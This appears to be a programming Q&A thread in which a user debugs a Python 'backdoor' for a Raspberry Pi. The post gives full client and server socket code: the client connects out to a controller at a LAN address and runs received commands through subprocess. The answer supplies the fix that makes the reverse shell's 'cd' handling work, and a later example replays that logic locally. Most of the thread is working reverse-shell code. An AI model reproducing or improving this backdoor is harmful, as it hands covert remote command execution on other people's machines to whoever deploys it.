can't change directory using python sockets

Time:06-18

I am building a 'backdoor' for my Raspberry. I have a problem: after creating the interactive shell, I can't change dir.

I edited my original code to make it short. I have been trying to resolve this problem for around 2-3 hours.

python3 - cd is not working in reverse shell - Not Working

Backdoor Shell doesn't allow me to change Directory - Not Working

Client:

import socket, json
import os
import subprocess
import sys

SERVER_HOST = '192.168.100.8'
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"


s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))

snd = []

data = json.dumps({"cwd": os.getcwd(), "usr": os.getlogin()})
s.send(data.encode())

while True:
    command = s.recv(BUFFER_SIZE).decode()
    if command == 'shell':
        while True:
            command = s.recv(BUFFER_SIZE).decode()

            if command.lower() == "exit":
                break
            if command.startswith("cd "):
                try:
                    os.chdir(f'{os.getcwd()}/{str(command[3:])}')
                except FileNotFoundError as e:
                    output = str(e)
                else:
                    output = ""
            else:
                output = subprocess.getoutput(command)
            cwd = os.getcwd()
            message = f"{output}{SEPARATOR}{cwd}"
            s.send(message.encode())
            if command == 'exit':
                break
    else:
        if command.lower() == "exit":
            break
        else:
            output = subprocess.getoutput(command)
        cwd = os.getcwd()
        message = f"{output}{SEPARATOR}{cwd}"
        s.send(message.encode())
s.close()

Server:

import socket,json
import os

SERVER_HOST = "192.168.100.8"
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_HOST, SERVER_PORT))
s.listen()

while True:
    client_socket, client_address = s.accept()

    data = json.loads(client_socket.recv(BUFFER_SIZE).decode())
    while True:
        print("TYPE SHELL")
        tmp = input(f"[*] Enter command: ")
        if tmp.lower() == 'shell':
                print("[*] Opening interactive shell")
                command = input(f"{data['cwd']} $: ")
                while command != 'exit':
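                    if not command.strip():
                        # Re-prompt on empty input; a bare `continue` here would loop forever
                        command = input(f"{data['cwd']} $: ")
                        continue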
                    client_socket.send(command.encode())
                    output = client_socket.recv(BUFFER_SIZE).decode()
                    results, cwd = output.split(SEPARATOR)
                    print(results)
                    command = input(f"{data['cwd']} $: ")
                print('[!] Closing interactive shell')

This is what I see in the shell:

/home/pi $: ls
1
Bookshelf 
client.py 
Desktop
Documents 
Downloads 
Music
Pictures 
Public
rm.sh
Templates 
Videos
/home/pi $: cd 1

/home/pi $: pwd
/home/pi
/home/pi $: mkdir 2 && cd 2 && touch 1 && ls && pwd 
1
/home/pi/2
/home/pi $: 

CodePudding user response:

The server needs to send the shell command to the client when you start the reverse shell. Otherwise, the client won't go into the inner while loop that contains the code that looks for the cd command.

So add the line:

                client_socket.send("shell".encode())

before

                print("[*] Opening interactive shell")
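
Why the session in the question looks the way it does, as an added example that is not part of the original post or the answer: a local, socket-free replay of the client's two branches. `handle` and `replay` are hypothetical names, and the scratch directory and command list are constructed.

```python
import os
import subprocess
import tempfile

SEPARATOR = "<sep>"  # same separator as the client on this page


def handle(command, in_shell_mode):
    """One iteration of the client's loop, run locally with no sockets.

    in_shell_mode=False: the outer branch, where the client stays if it never
    receives "shell"; cd goes to a throwaway child shell like any other command.
    in_shell_mode=True: the inner branch, where cd is applied with os.chdir().
    """
    if in_shell_mode and command.startswith("cd "):
        try:
            os.chdir(command[3:].strip())  # relative paths resolve against cwd
            output = ""
        except OSError as e:
            output = str(e)
    else:
        # The child /bin/sh inherits our cwd, may cd, then exits; ours is untouched.
        output = subprocess.getoutput(command)
    return f"{output}{SEPARATOR}{os.getcwd()}"


def replay(commands, in_shell_mode):
    """Run commands in a constructed scratch dir; return (scratch, [(output, cwd), ...])."""
    start = os.getcwd()
    with tempfile.TemporaryDirectory() as scratch:
        scratch = os.path.realpath(scratch)
        os.mkdir(os.path.join(scratch, "1"))  # stands in for the session's "1"
        os.chdir(scratch)
        try:
            replies = [handle(c, in_shell_mode) for c in commands]
            return scratch, [tuple(r.rsplit(SEPARATOR, 1)) for r in replies]
        finally:
            os.chdir(start)  # leave the scratch dir before it is deleted


if __name__ == "__main__":
    session = ["cd 1", "pwd", "mkdir 2 && cd 2 && pwd"]  # modelled on the session above
    for mode in (False, True):
        scratch, results = replay(session, mode)
        print("inner loop" if mode else "outer loop")
        for cmd, (out, cwd) in zip(session, results):
            print(f"  {cmd!r}: output={out.replace(scratch, '~')!r} cwd={cwd.replace(scratch, '~')!r}")
```

In the outer branch the reported cwd never moves, even though a chained `cd 2 && pwd` prints the new path from inside its own child shell; in the inner branch `cd 1` persists across later commands.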